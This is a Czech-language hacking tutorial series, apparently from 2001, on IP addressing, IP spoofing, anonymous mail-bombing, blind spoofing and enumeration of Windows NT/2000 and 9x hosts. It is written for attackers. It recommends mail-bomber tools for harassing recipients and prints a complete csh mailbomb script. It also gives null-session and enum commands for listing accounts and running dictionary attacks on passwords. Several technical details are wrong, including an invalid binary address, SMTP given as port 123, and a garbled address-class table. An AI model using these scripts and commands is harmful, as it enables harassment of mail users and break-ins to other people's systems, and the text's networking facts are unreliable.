IP adresa je v reálné podobě 32-bitové jedinečné číslo které se smí na superdálnici objevit pouze jednou. IP adresu si tak můžete představit jako 32-místnou kombinaci nul a jedniček. Vzhledem k tomu, že lidské bytosti si čísla pamatují velice těžko (schválně si zkuste na papír napsat za sebe různě na přeskáčku 32 nul a jedniček a otestujte si, jak dlouho vám bude trvat, než se celou posloupnost naučíte nazpamě»), jsou IP adresy vyjádřeny čtyřmi dekadickými čísly oddělenými tečkami.

IP adresa tak může vypadat například takto:
110000010.01011010.00011111.01001010

což po převodu do mnohem přehlednější dekadické soustavy vypadá takto:
194.90.31.74

a toto číselné vyjádření už je zapamatovatelné mnohem jednodušeji.

Pro vůbec nejjednodušší zapamatování si IP adres byl zaveden princip tzv. DNS převodu IP adres (Domain Name System) na jmenovité domény. Slova si totiž člověk zapamatuje mnohem snáze než čísla. Existuje proto velký registr DNS záznamů, kde je jednotlivým IP adresám přidělena doména.

Proto například http://www.inzine.cz/ je pouhá DNS registrace IP adresy: 195.98.130.105 (schválně si zkuste sami nainstalovat například VisualRoute (jeden z nejlepších stopovacích programů pro Windows) a do příkazové řádky napište http://www.inzine.cz/ – uvidíte během několika málo vteřin kompletní cestu od vašeho počítače směrem k http://www.inzine.cz/ včetně všech uzlů na síti a jejich IP adres.

 Jednotlivé IP adresy jsou všeobecně rozdělovány a označovány podle následující tabulky:

 

 A         S.h.h.h.            Velké korporace            1.0.0.0 – 126.0.0.0                    16 777 214

 B         S.S.h.h.            Větší korporace             128.1.0.0 – 191.254.0.0             65 543

 C         S.S.S.h                         Malé firmy                    192.0.1.0 -254                        223.225.254.0   

 D                                   multi-cast                    224.0.0.0 –239.255.255.255      neznámý

 E                                    experimentální                         240.0.0.0 -254.255.255.255     neznámý

 kde S znamená „sí»ová adresa“ (adresa celé sítě, kterou přiřazuje InterNIC) a h je „adresa hostu“ (konečná adresa definující konkrétní počítač nebo podsí» počítačů).

 IP adresa typu A je v současnosti přidělována jen v opravdu ojedinělých případech, velké korporace (Microsoft, Ford, Shell apod.) a velcí poskytovatelé internetu většinou obdrží rozsah IP adres typu B a malé firmy a malí poskytovatelé rozsah typu C. IP adresy typu D jsou určeny pro tzv. „multi-cast“, což je směrování toku dat z jedné IP adresy na větší rozsah IP (nikoliv tedy komunikace IP adresa – IP adresa, ale IP adresa – rozsah IP adres). IP adresy typu E jsou využívány pro experimentální a testovací účely.

Jak je patrné z tabulky, nikde není přiřazen rozsah adres 127.*.*.* - ten je totiž rezervován pro vnitřní adresování sí»ových zařízení. Specifickou funkci má IP adresa 127.0.0.1, které se říká „loop back“ (smyčka) a bývá jí označen každý lokální počítač bez udání jiné IP adresy.

Dalším důležitým pojmem patřícím do protokolu IP je tzv. port. Pokuste se vybavit si, jak vypadá váš běžný čas trávený na superdálnici. Surfujete po webových stránkách, odesíláte e-maily, stahujete soubory z FTP serverů, komunikujete prostřednictvím ICQ nebo IRC, připojujete se na vzdálené počítače. To všechno z jedné jediné stanice a mnohdy ve stejném okamžiku. Aby bylo možné rozlišit prostřednictvím kterého software a za jakým účelem byla data odeslána, existují již zmiňované porty, které si můžeme v praxi představit jako dveře vedoucí do a z počítače.

Jako ve starém hradě existuje hlavní brána, vedlejší brány, vchod pro služebnictvo nebo tajná chodba, tak existují (a většinou jsou přesně definovány) vstupní a výstupní brány pro elektronická data – porty, označované číslem. Pokud tedy budete odesílat e-mail na počítač s určitou IP adresou, váš poštovní klient do odesílaných paketů přidá i informaci o portu, na který mají data dorazit (aby se tak nestalo, že pakety bude namísto Outlooku zpracovávat Internet Explorer) – v tomto případě port číslo 123.

Pokud surfujete po webových stránkách, pak k nim na webovém serveru přistupujete prostřednictvím portu číslo 80, naopak standardní port pro připojení k FTP serveru je 21, komunikace na IRC probíhá na portech 6*** atd.

Port bývá udáván přímo za IP adresu ve formě čísla psaného za dvojtečkou:
například 194.228.7.13:21

Informace o IP adrese odesílatele a příjemce (včetně portu) v hlavičce každého paketu je uložena v tzv. IP hlavičce. Kompletní hlavička každého paketu tak na základě informací, které už znáte, obsahuje dvě části – TCP hlavičku (informace o paketech samotných) a IP hlavičku (informace o IP adresách a portech).

Právě změny v IP hlavičce jsou využívány pro tzv. „spoofování“ – jde o oficiální výraz pro vydávání se za někoho jiného, než kým doopravdy jste na Internetu a patří mezi nejpokročilejší techniky anonymizování sebe sama. Prozatím vstřebejte a prakticky si ověřte informace uvedené v tomto díle, abychom se příště mohli věnovat právě spoofingu.

Magellan
(31.10.2001)

IP Spoofing je jedna z nejpoužívanějších hackerských metod s nebývalými možnosti uplatnění. Velice stručně řečeno jde o to, že u všech odchozích TCP/IP packetů je zmeněna originální zdrojová IP adresa počítače (tedy počítače ze kterého data odcházejí) na jinou. Tím předstíráme, že jsme někým jiným, než doopravdy jsme. Shrňme si to, co už víme: Veškerá komunikace na Internetu je řízena protokolem TCP/IP, který zajiš»uje jednak jedinečné adresování všech počítačů zapojených do sítě (IP adresy) a zároveň se stará o vlastní přenos všech dat ve formě stejně dlouhých balíčků dat – packetů – včetně zabezpečení jejich celistvosti (zkrátka aby data došla komplet v pořádku na místo určení.) – což je starost TCP.

Jak už také víte, ke každému packetu je přiřazena hlavička, která kromě jiných informací obsahuje také IP adresu stroje, ze kterého jsou packety odesílány (zdrojová IP adresa) a IP adresu počítače, kam packety směřují (cílová IP adresa). Pokud jste například k Internetu připojeni prostřednictvím proxy serveru (drtivá většina všech firemních pevných linek), pak zdrojová IP adresa bude patřit vaší proxy, respektive poštovnímu serveru. V případě přímého pevného přípojení (počítač – HUB/SWITCH – router) budete navenek vystupovat s IP adresou toho počítače, za kterým sedíte. Pokud jste připojeni dial-upem (klasickým modemem nebo prostřednictvím ISDN), dostanete IP adresu dynamicky přidělenou serverem poskytovatele internetových služeb při každém připojení k Internetu (vaše IP adresa může být pokaždé jiná).

Při cestě Internetem jsou packety na své pouti směrovány routery, které mají tu důležitou vlastnost, že ignorují zdrojovou IP adresu a starají se jen a pouze o IP adresu cílovou (což je logické – routeru je ve veřejné síti jedno, odkud data směrují, jeho funkcí je datům zabezpečit cestu k cílové IP adrese). Router tedy převezme příchozí packet, zjistí jeho cílovou adresu a směruje data dál.

Z toho všeho vyplývá, že je teoreticky (i prakticky) možné změnit zdrojovou IP adresu v hlavičce jednotlivých packetů na téměř cokoliv (samozřejmě při zachování pravidel adresace IP), aniž by to bylo ku škodě při přesunu dat po síti.

K čemu nám to může být dobré?

Třeba k tomu, abychom mohli odesílat naprosto anonymní e-maily. Už v první kapitole tohoto seriálu, která se věnovala anonymitě, jsme si řekli, že vaše IP adresa je v první řadě to, co vás na Internetu identifikuje. IP adresa je jedinečná a tudíž velice lehce vystopovatelná. Pokud odešlete e-mail ze svého počítače, jeho cestující packety budou vždy obsahovat jako zdrojovou IP adresu právě tu vaši. Nyní vám už ale nic nebrání v tom, abyste zkrátka zdrojovou IP adresu v hlavičce packetů změnili na jakoukoliv jinou a rázem odesíláte anonymní e-maily.

Vždy ale mějte na paměti naprosto zásadní problém, který s sebou využití metody IP spoofingu přináší – pokud jednou změníte zdrojovou IP adresu ve svých odchozích packetech, ztrácíte tím možnost zpětné vazby. Protože totiž packety obsahují změněnou IP adresu, už nikdy se nedokáží vrátit nazpět k vám – tedy na zdrojou IP adresu původní. Nečekejte proto, že vám někdo na e-mail se spoofovanou hlavičkou odpoví. Příjemce se o to samozřejmě může pokusit, ale e-mail už nikdy nenajde původního zpětného adresáta. IP Spoofing je tak metodou čistě jednocestné komunikace.

IP Spoofing proto není možné využít pro zajištění anonymity při jakékoliv činnosti na Internetu, která vyžaduje obousměrnou komunikaci – surfování po webu, chatování na ICQ nebo IRC apod.

Jak je prakticky možné zdrojovou IP adresu v odchozích packetech změnit? Nasnadě je samozřejmě „stará dobrá ruční práce“ – packety většinou čekají v odchozí frontě serveru na to, až na ně přijde řada. Právě tam (v cache paměti serveru) je možné do nich ručně zasáhnout. Jenže my samozřejmě potřebujeme něco mnohem jednoduššího a hlavně automatického. Pokud byste například chtěli odeslat hned několik (neřku-li desítek nebo stovek) anonymních e-mailů se spoofovanými hlavičkami najednou, byla by to otrocká a většinou naprosto nezvládnutelná práce. Proto existují speciální programy, které tuto špinavou práci udělají za vás – říká se jim mail-bombery a jsou určeny k masovému odesílání anonymních e-mailů, mnohdy spojených s dalšími triky, které mají za úkol minimálně zkazit náladu adresáta. Pojďme se podívat na ty, které existují a jsou všeobecně nejpoužívanějšími:

KaBoom

KaBoom - a jeho největší konkurent Avalanche - jsou asi nejpoužívanějšími mail-bombery a e-mail spoofery vůbec. Kromě toho, že vám KaBoom umožní zvolit si e-mailovou adresu, ze které mají být anonymní maily odeslány (je libo saddam@hussain.com nebo slon@ze.zoo.ve.dvore.kralove.cz ?), automaticky také připojí podpis nebo vloží do každé zprávy text, který mu nadefinujete (ideální pro všechny ničemné spammery), nabízí také jednu (pro adresáta) velice nepříjemnou funkci – umožňuje e-mail adresáta zaregistrovat na stovky e-mail listů bez jeho vědomí. E-mail listy jistě znáte, pokud například poštou odebíráte textovou verzi Neviditelného psa Ondřeje Neffa nebo třeba avízo inZine. Podobných e-mail listů dnes existují minimálně tisíce. KaBoom tak umí hodně znepříjemnit život adresáta vašich anonymních e-mailů tím, že jej „zapíše“ jako předplatitele hutné řady e-mail listů bez jeho vědomí. Třemi kliknutími myši tak můžete někomu připravit krušné chvilky při manuálním od-registrování všech zapsaných e-mail listů.
Na Internetu hledejte:
Kaboom!.zip
Kaboom.exe

Avalanche

Avalanche je dlouholetý rival KaBoomu a funguje prakticky stejně. Má oproti KaBoomu jednu podstatnou výhodu, ale také jednu nevýhodu – výhodou je, že je velmi dobře naprogramovaný, je přehledný a lehce pochopitelný. Práce s ním je pro laika nebo začátečníka jednodušší než s KaBoomem. Na druhou stranu je nutné uvést, že autor Avalanche se své dílko rozhodl naprogramovat ve Visual Basicu, což s sebou přináší zbytečně velký zkompilovaný kód a hlavně nutnost stáhnout si potřebné knihovny z Internetu. Spustitelné EXE soubory napsané původně ve Visual Basicu totiž pro svůj chod vyžadují několik DLL knihoven, které nejsou standardní součástí Windows. Pokud si je jednou nainstalujete na svůj počítač, už vám budou v pohodě běhat i ostatní Visual basicovské aplikace.
Na Internetu jej hledejte jako:
alanch*.zip
avalanche*.zip
avalanche.exe

Up Yours

Jeden z nejpopulárnějších a zároveň nejlepších bomberů a mail-spooferů. Je skvěle napsaný, spotřebuje minimum paměti i strojového času procesoru (proto jej s úspěchem rozběhnete i na naprosto archaických strojích) a může se pochlubit nejlepším systémem spoofování zdrojové IP adresy ze všech jmenovaných bomberů. V dnešní době se již hodně špatně hledá, proto vám dá dost práce jej na Internetu vypátrat.
Hledejte:
Upyours.zip
Upyours2.zip
Upyours3.zip

eXtreme Mail

eXtreme Mail je podobný Avalanche nebo KaBoomu i když nedosahuje jejich kvalit. Je opět velmi dobře napsaný a má vlastní instalátor (výhoda pro začátečníky).
Na Internetu jej hledejte:
Xmailb1.zip
Xmailb1.exe

Pro platformu Windows navíc existují ještě dílka jako Unabomber nebo Homicide, z nichž oba nedosahují úrovně výše jmenovaných utilitek, proto je ani nemá smysl testovat.

Pokud byste potřebovali e-mail bomber/spoofer pro UNIX, pak můžete například využít následujícího bomberu, který napsal CyberGoat. Jedná se o nedlouhý skript, který je možné přímo spustit z příkazové řádky UNIXu (obdoba BAT souborů pro Windows).

#!/bin/csh
# Anonymous Mailbomber
# do chmod u+rwx <filename> where filename is the name of the file that
# you saved it as.
#*** WARNING - THIS WILL CREATE AND DELETE A TEMP FILE CALLED
# "teltemp"
# IN THE DIRECTORY IT IS RUN FROM ****
clear
echo -n "What is the name or address of the smtp server ?"
set server = $<
#echo open $server 25 > teltemp
echo quote helo somewhere.com >> teltemp
#The entry for the following should be a single name (goober),
#not goober@internet.address mailto:goober@internet.address.
echo -n "Who will this be from (e.g. somebody) ?"
set from = $<
echo quote mail from: $from >> teltemp
echo -n mailto:Who%20is%20the%20lucky%20recipient%20(e.g.%20someone@somewhere)%20?
set name = $<
echo quote rcpt to: $name >> teltemp
echo quote data >> teltemp
echo quote . >> teltemp
echo quote quit >> teltemp
echo quit >> teltemp
echo -n "How many times should it be sent ?"
set amount = $<
set loop_count = 1
while ($loop_count <= $amount)
echo "Done $loop_count"
ftp -n $server 25 < teltemp
@ loop_count++
end
rm ./teltemp
echo $amount e-mails complete to $name from $from@$server
# --------------------
# MailBomb by CyBerGoAT

Využítí IP Spoofingu na Internetu má samozřejmě mnohem více variant, přičemž jednosměrné odesílání anonymních e-mailů je jen jednou z nich, navíc tou nejjednodušší. Spoofování zdrojové IP adresy je v mnohem větší míře využíváno při vedení hackerských útoků na cizí počítačové systémy.
Tady jsou základní metody a jejich využití:

Flooding

Flood je slovo používané v angličtině a znamená „záplava“ nebo „povodeň“, což dokonale vystihuje princip hackerské činnosti, při které se spoofing využívá. Flooding je totiž metoda, při které hacker doslova zaplaví cílový počítač takovým množstvím dat, že je obě» nedokáže zvládnout, takže omezuje veškerou ostatní činnost (floodovaný webový server například odmítne zpracovávat další požadavky na prohlížení webových stránek a „věnuje se“ jen zpracování záplavy dat) nebo v horším případě kolabuje a hroutí se.
Záplavová data jsou spoofována (jsou měněny zdrojové IP adresy v hlavičkách packetů) proto, aby nebylo možné odhalit útočníka a znemožnit mu další postup (například tím, že by správce poškozeného webového serveru začal používat stejnou metodu a zasypávat počítač hackera záplavou dat).

Flooding (ve spojení se spoofingem) je všeobecně znám ve formě tzv. DoS (Denial of Service) nebo DDoS (Distributed Denial of Service) útoků, díky nimž byly „shozeny“ i takové obrovské servery jako yahoo.com nebo cnn.com. O DoS a DDoS útocích si podrobně povíme v některé z následujících kapitol.

 

Blind spoofing

Blind spoofing nebo-li „spoofování naslepo“ je metoda, při které se hacker snaží získat přístup na vzdálený počítač tím, že se vydává za někoho, komu vzdálený počítač tzv. „věří“. Na operačním systému UNIX je totiž možné nastavit vlastnost „věřím ti“ u kteréhokoliv počítače. Jde o to, že chcete například z jednoho unixového počítače přistupovat na další unixový počítač na druhém konci světa a obtěžuje vás věčné logování a nastavování. Můžete proto určit, že na počítač X nebude nutné se logovat, pokud budete přistupovat z počítače Y. (unixáři jistě znají .rhost a rlogin). Proč složitě útočit na cizí počítač, když je možné se na něj nalogovat skoro bez práce?

Hacker postupuje takto: vždy se začíná „osaháním“ cílového stroje. Hacker zjiš»uje kde počítač je, jaká je topologie sítě okolo, jaké porty jsou na počítači otevřené a které služby na něm běží (to se zjistí právě díky existenci otevřených portů). Pokud je zjištěno, že na cílovém počítači je otevřen port číslo 513, je jasné, že na něm funguje služba rlogin, a tudíž pravděpodobně existuje minimálně jeden jiný počítač, kterému tento cílový „věří“.

Nyní je otázkou náhody, dobrého odhadu nebo sběru informací, jestli se hacker „trefí“ do IP adresy počítače, který patří mezi ty, kterým cílový „věří“. Většinou je testován celý poslední sí»ová segment (dejme tomu, že cílový počítač má IP adresu 194.168.0.1, pak bude hacker zkoušet pravděpodobně 194.168.0.X kdy X je z intervalu <2-254>, a to tak, že svoji zdrojovou IP adresu při pokusu o nalogování změní na jednu z výše uvedených. Zároveň je ale vždy nutné pomocí floodování zaneprázdnit ten počítač, kterému daná IP adresa doopravdy patří - a to z jediného prostého důvodu – odpověď na útočné packety samozřejmě bude odcházet na spoofovanou IP adresu. Hacker samozřejmě nepotřebuje, aby tyto odpovědi došly na místo určení, protože by mohly spustit poplach.

Naprosto stejnou metodu spoofování IP adresy naslepo využil jeden z nejslavnějších hackerů světa Kevin Mitnick při osudném útoku na počítač jeho hlavního pronásledovatele Tsutomu Shimomura. Mitnick nejprve díky správnému odhadu IP adresy „důvěryhodného“ počítače získal přístup na jeden z terminálů na vnitřní síti, kde byl zapojen také Shimomurův stroj a odtud stejnou metodou získal přístup k datům svého úhlavního nepřítele. Tento zdařilý kousek mu ale byl následně osudným, protože způsobil zahájení nevídané pátrací akce, po které byl nakonec Kevin Mitnick dopaden a odsouzen.

Magellan
(26.11.2001)

V minulém díle jste se dověděli, jakým způsobem hacker prohledává lokální nebo vzdálené sítě tak, aby se dopídil základních informací o počítači nebo celém segmentu sítě, do něhož by rád pronikl. Nyní již tedy víme, co je scanování („scanning“), k čemu se využívá a co všechno touto metodou můžeme zjistit o cílovém počítači, aniž bychom nějak vážně riskovali ohrožení vlastního bezpečí. Scanování je totiž metoda sběru informací, při jejímž využití se útočník jakýmkoliv způsobem nesnaží proniknout dovnitř systému, pouze se na základě vnějších znaků vzdáleného systému snaží rozpoznat, o jaký počítač se jedná, který operační systém na něm běží a které otevřené komunikační kanály (porty) bude možné případně využít.

Nyní hacker zná vnější znaky počítače oběti, ví, kde se nachází, který operační systém spravuje jeho „železo“ a jaké existují možné cesty vstupu dovnitř (aktivní otevřené porty). Jak je asi jasné každému, kdo se někdy pokusil proniknout do jakkoliv střeženého a elektronickými hradbami obehnaného počítače, cílem je nalezení uživatelského konta s co nejvyššími prioritami (root v unixu resp. administrator ve Windows) a získání jeho hesla. O získávání informací, které hackerovi ještě chybí pro úspěšný vstup do systému po úspěšném dokončení scannování, si povíme dnes. Řeč bude o takzvané enumeraci (z anglického „enumeration“ – výčet, seznam), což je mnohem komplexnější způsob ohledávání vzdáleného počítače, při němž (na rozdíl od scanování) dochází k hloubkovému průzkumu operačního systému napadaného počítače – útočník se snaží hlavně o nalezení existujících uživatelských účtů (čím vyšší priorita práv, tím lépe) a všech možných systémových zdrojů, které by bylo možno využít pro vlastní průnik dovnitř systému.

Jak už popis metody enumerace napovídá, jedná se o činnost, při které už útočník aktivně vstupuje do systému vzdáleného počítače (na rozdíl od scanování, při kterém většinou jen pasivně sleduje dění na počítači oběti) a prohledává jeho skulinky. Jak už bylo řečeno, pro enumeraci je důležité správně detekovat operační systém (typ a verzi) běžící na napadaném počítači – různé operační systémy používají různé způsoby správy uživatelských kont, komunikace s prostředím (využívají různé speciální porty a sí»ové služby) a systémové prostředky (například pro správu připojených periferií).

 

MICROSOFT WINDOWS (NT/2000/XP/9x)

I když vám bude každý „hardcore“ hacker tvrdit, že jediný pravý operační systém je UNIX a jeho jednotlivé varianty, drtivá většina z vás se bude mnohem více zajímat o operační systém, který je možné vidět všude kolem nás – jsou to tolik diskutované Windows firmy Microsoft.

Již prastará NT-čka si získala (a vcelku oprávněně) pověst jednoho z nejhůře zajištěných operačních systémů na světě. Mnohdy totiž sama nabízejí důležité informace útočníkovi. Zásadní vlastností Windows (budeme dále mluvit hlavně o verzích NT a 2000, které se jako výbava serverů používají nejčastěji – nicméně pro ostatní verze platí ve většině případů totéž) - co se sí»ové komunikace týká - je využívání vlastních CIFS/SMB (Common Internet File System/Server Message Block) a NetBIOS protokolů, které spravují datovou komunikaci. Windows samozřejmě jsou schopny komunikovat prostřednictvím TCP/IP a dokonce se i obejdou bez NetBIOSu, nicméně jejich jádro je pro využití vlastních protokolů nakonfigurováno po čisté instalaci – to v mnoha případech velmi ulehčuje práci hackerovi, jak si později ukážeme.

Stěžejním nástrojem každého piráta, který hodlá nabourat ochranu serveru běžícího na Windows NT/2000, je tzv. Windows NT/2000 Resource Kit, což je už od dob Windows NT v3.1 existující soubor utilit určených pro správu windowsových stanic, které má na svědomí přímo Microsoft. NTRK/W2KRK (NT Resource Kit/Win2k Resource Kit) obsahuje nejen kolekci původně UNIXových utilit, ale také implementaci skriptovacího jazyka Perl (jehož obliba v poslední době stále roste) nebo programy pro vzdálenou správu Windows NT/2000, které nejsou součástí standardní instalace Windows (ani ve verzi Professional). Vzhledem k tomu, že Resource Kit je možné opravdu účinně využít pro útok proti vzdálenému systému běžícímu na Windows NT/2000, někdy se mu také přezdívá „Windows NT Hacking Kit“. Pro správce NT/2000 serverů bych rozhodně doporučil Resource Kit opatřit a otestovat, každopádně pokud možno zásadně nepoužívat vzhledem k tomu, že se jeho nainstalování na spravovaném serveru může obrátit proti vám.

Pojďme se nyní podívat na hlavní slabiny serverů Windows NT/2000. Achillovou patou NT/2K jsou již zmiňované protokoly CIFS/SMB a NetBIOS, které obsahují mimo jiné i aplikace, které na TCP portu č. 139 uvádějí informace o stroji prakticky komukoliv, včetně nezvaných návštěvníků. Pokud při scanování hacker nalezne na cílovém stroji otevřený port číslo 139, zkusí třeba následující:

net use file://IP/ adresa\IPC$ “” /u:””

například tedy:

net use \\194.228.1.1\IPC$ “” /u:””

Výše uvedený příkaz (nazývaný také “null session”) připojí vetřelcův stroj na počítač s IP adresou 194.228.1.1 na jeho skrytý komunikační kanál jako anonymní uživatel (/u:””) s prázdným heslem (“”). Pokud administrátor vzdáleného počítače takovouto možnost připojení na jeho server nezakázal (tedy neodfiltroval všechny pokusy o TCP komunikaci na portu 139 - což se v drtivé většině případů nestává), má vetřelec otevřený přímý kanál k jeho stroji a může tak s klidným svědomím zjiš»ovat další užitečné informace o tomto serveru (informace i lokální síti, uživatelích, jejich skupinách a jednotlivých pravomocech, informacích uvedených v registrech apod.). Microsoft byl záhy informován o tomto velkém bezpečnostním problému a vydal ochranné patche jak pro NT (kam je nutné do registrů doinstalovat položku nazvanou RestrictAnonymous, která sice nezabrání možnosti anonymního připojení se na vzdálený Windows NT server, ale omezí možnost úniku citlivých informací o systému na mnohem snesitelnější úroveň), tak pro Win2000, kde je možnost ochrany přímo implementována v Security Settings (nastavte položku “Local Policy Setting:” na “No access without explicit anonymous permission”).

 

NetBIOS

Zkoumání NetBIOSu vzdálených Windows NT/2000 je záležitost opravdu jednoduchá, zvláš» když mají Windows přímo v sobě zabudované všechny nástroje, které bude hacker pro sběr informací potřebovat. Začne příkazem net view s jehož pomocí si může prohlédnout informace o jednotlivých doménách, které vzdálený server spravuje:

C:\net view /domain

Zobrazí seznam domén existujících ve vzdáleném systému, například:

WORKGROUP
UCTARNA
FINANCNI
VYROBA

Pokud bude chtít vidět bližší informace o jednotlivých doménách, může použít opět příkaz net view:

C:\net view /domain:uctarna

Server Name Remark

file://HONZA/ Tohle je Honzuv stroj
file://UCTO/ Ucetni stroj
file://PETRA/ ja jsem sekretarka

Dozví se tak, které počítače jsou aktuálně součástí domény UCTARNA a doplňkový komentář, který je k nim přiřazen.
Velice zajímavá utilitka je také nbstat (je součástí všech Windows), která zobrazuje nejen protokolové statistiky, ale také seznam připojení přes TCP/IP, které využívá NetBIOS. Zkuste například na svém počítači:

nbtstat –A 194.228.1.1
(kde 194.228.1.1 je IP adresa vzdáleného) počítače

a obdržíte tabulku jmen v seznamu vzdáleného počítače (parametr „-a“ vypíše jejich IP adresy).

Velice dobrá nadstavba nbtstat je tzv. nbtscan - funguje velmi podobně jako nbtstat, jen s tím rozdílem, že je schopen získávat informace o celých podsítích a navíc je vypisuje do tabulky v poněkud přehlednější formě.

Další utilitky, jež jsou součástí Resource Kitu a jsou užitečné při zkoumání serverů, na kterých běží Windows NT/2000, jsou nltest (identifikuje primární a záložní správce domén), rtmshare (velmi podobný net view) nebo srvcheck (zobrazuje informace o sdílených adresářích a discích a jednotlivých autorizovaných uživatelích systému).

Na Internetu je v současnosti možné najít již celou řadu velice dobrých samostatných prográmků určených pro vzdálenou administraci Windows NT/2000, které je možné využít ke sběru informací. Jedním z nich je DumpSec, který se nachází zdarma na webové stránce firmy Somarsoft (http://www.somarsoft.com/) . Jedná se o velice komplexně zpracovaný nástroj, s jehož pomocí lze zkontrolovat kvalitu nastavení NT/2000 serveru - vše od přístupových práv k souborům až po výčet služeb, které na tomto počítači běží.

Zajímavý je také Legion, který umí prohledat vzdálený server a najít na něm všechny sdílené adresáře, které jednotliví uživatelé přiřazení do existujících domén dávají k dispozici.

Číslem jedna mezi "sběrači informací" nicméně zůstává utilitka s jednoduchým názvem enum. Jejím autorům se podařilo do jediného prográmku vtěsnat veškeré nástroje, které si hacker prahnoucí po osahávání windowsového stroje může přát. Enum totiž umí zobrazit informace o existujících uživatelích a jejich přiřazení do skupin, seznam strojů v jednotlivých doménách, seznam nasdílených adresářů na všech aktivních strojích a mnoho dalších. S enumem si tak hacker vystačí na celé pouti od scanování až po hádání hesla uživatele, jehož účet (také pomocí enum) nalezl.

Například:
C:\enum -U -d -P -L -c X.X.X.X

kde X.X.X.X je IP adresa stroje, který ho zajímá. Enum se při použití této syntaxe nejprve pokusí spojit se vzdáleným počítačem prostřednictvím již zmiňované null session, následně zjistí nastavení správy hesel (zjistí, jestli je nastavena minimální nutná délka hesla, časové intervaly pro vypršení platnosti hesla apod.), zobrazí informace o existujících doménách a jednotlivých uživatelích (včetně přiřazených atributů a uživatelských práv - kdo má administrátorská privilegia nebo kdo je naopak uživatel bez možnosti zásahu do systému).

Znalost existujících uživatelských kont a jejich privilegií je pro hackera stěžejní, protože má za sebou většinu tvrdé dřiny (tuto otročinu navíc bez odmlouvání odpracuje enum). Nyní nezbývá nic jiného než uhodnout nebo jiným způsobem zjistit uživatelské heslo (samozřejmě pro konto uživatele s co nejvyššími pravomocemi - v ideálním případě administrátor). Zdá se, že tady cesta končí ve slepé uličce. Jenže existuje tolik neopatrných uživatelů, kteří si jako heslo zadají něco tak triviálního jako jméno své manželky nebo značku svého automobilu... díky těmto hlupákům hackeři vítězí. Někdy pomůže i enum, který podle dodaných slovníků hesel umí (a opravdu rychle) přístupová hesla odzkoušet sám.

Takže:

C:\enum -D -u jmeno_uzivatele -f soubor_se_slovnikem

Úspěch je v drtivé většině případů zaručen.

Magellan
(19.12.2001)

style="FONT-SIZE: 10pt; FONT-FAMILY: Arial">Nejdůležitější věcí, kterou je nutné si uvědomit, pokud jako administrátor spravujete počítač vybavený operačním systémem Windows 95/98 nebo Milennium (zkráceně budu dále uvádět "Win 9x"), je fakt, že tyto varianty operačních systémů firmy Microsoft nebyly a nejsou zamýšleny jako opravdové sí»ové (a tudíž i "bezpečné") systémy - místem jejich určení jsou počítače koncových uživatelů. Operační systém Windows 9x byl vytvořen jako co nejjednodušší základní výbava pro kancelářské a domácí využití (čemuž odpovídají i notorický známé doplňky jako Outlook Express, WordPad nebo Internet Explorer).

Windows 9x jsou tak vcelku jednoduše nainstalovatelné (to samozřejmě v případě, že používáte "standardní" hardware - majitelé speciálních zvukových karet nebo videostřižen mají jistě spoustu nepříjemných zkušeností a prošli řadou probdělých nocí strávených u instalace nového kusu železa), na druhou stranu ale prakticky chybí jakékoliv administrátorské utilitky pro správu systému, neřku-li výbava pro zprovoznění vzdáleného přístupu (pokud přejdeme existenci opravdu nebezpečného Dial-Up Serveru). Na druhou stranu je nutné připustit, že Microsoft v hierarchii svých produktů s touto situací počítal, takže díky tomu, že Win 9x nejsou opravdovým víceuživatelským operačním systémem, nikdy se nesetkáte se serverem, který by na Win 9x běžel. Lokální i větší sítě založené na softwarové platformě Microsoftu jsou vždy spravovány servery s operačním systémem Windows NT nebo 2000 (aktuálně se pomalu, ale jistě začínají rozšiřovat i nová XP-čka, jejichž nástup byl - jak už se u Microsoftu stalo pravidlem - provázen notnou dávkou problémů. Vždy» u kterého operačního systému v historii bylo samotným výrobcem oficiálně přiznáno neuvěřitelných 42 důležitých chyb ještě před uvedením na světový trh?), takže je hackerovi postavena do cesty překážka ve formě lépe zabezpečných Windows NT nebo 2000 (resp. XP).

U Windows 9x existují dvě základní oblasti možných průniků - vzdálený přístup (za využití špatného nakonfigurování systému anebo pokusem o ošálení uživatele tak, aby na svém počítači spustil kód, který mu nějakým způsobem vnutíte - vezměte jako příklad všechny ty viry a trojské koně ukryté v přílohách e-mailů, které se poslední dobou objevují častěji než houby po dešti), anebo prostřednictvím lokálního přístupu, kdy je hacker schopen získat fyzický přístup k počítači (ano, i to je samozřejmě způsob hackování - nejen vzdáleným přístupem je pirát živ).

 

Windows 9x a vzdálený přístup

Vzdálený přístup k počítači vybavenému Windows 9x je možný čtyřmi základními způsoby:

• přímé připojení ke sdíleným zdrojům počítače (sdílené disky, dial-up server apod.)
• nainstalování backdoor serveru
• využití známých chyb operačního systému (padání do "modré obrazovky" apod.)
• denial of service (odepření služby)

První tři z vyjmenovaných způsobů lze využít pouze v případě, že je vzdálený systém buď špatně nakonfigurován, anebo jsou jeho uživateli lhostejné naprosto základní poučky o pravidlech chování s počítačem připojeným k síti (resp. o těchto pravidlech uživatel ani neví, což je problém 99% případů všech kancelářských strojů - schválně se zkuste zeptat nejbližší sekretářky, co jí říká pojem "backdoor").

Denial of Service je speciální technika používaná jak na Windows tak na Unixech a zaslouží si samostatnou kapitolu, protože je technikou opravdu komplexní, vysoce účinnou, ale také nebezpečnou (nejen pro počítač oběti).

1. Přímé napojení na sdílené zdroje počítače

Na počítači s Windows 9x existují tři různé mechanismy pro přímý vzdálený přístup - sdílení souborů a tiskáren (většina z uživatelů kancelářských nebo školních počítačů jistě zná obojí. My se samozřejmě budeme věnovat pouze sdíleným souborům, protože přístup ke vzdálené tiskárně asi těžko prakticky využijete jinak, než prostřednictvím série výtisků oplzlých textů a podobných srandiček), dial-up server (v ten je možné jakoukoliv Win 9x stanici velmi jednoduše přetvořit) a vzdálená manipulace se systémovými registry.

U sdílených disků/adresářů/souborů je nutné si uvědomit dvě skutečnosti - nejprve musíme zjistit, jestli vzdálený počítač vůbec nějaké zdroje ke sdílení nabízí, a druhak jestli je přístup k nim povolen komukoliv, anebo jen uživatelům znalým příslušná hesla.

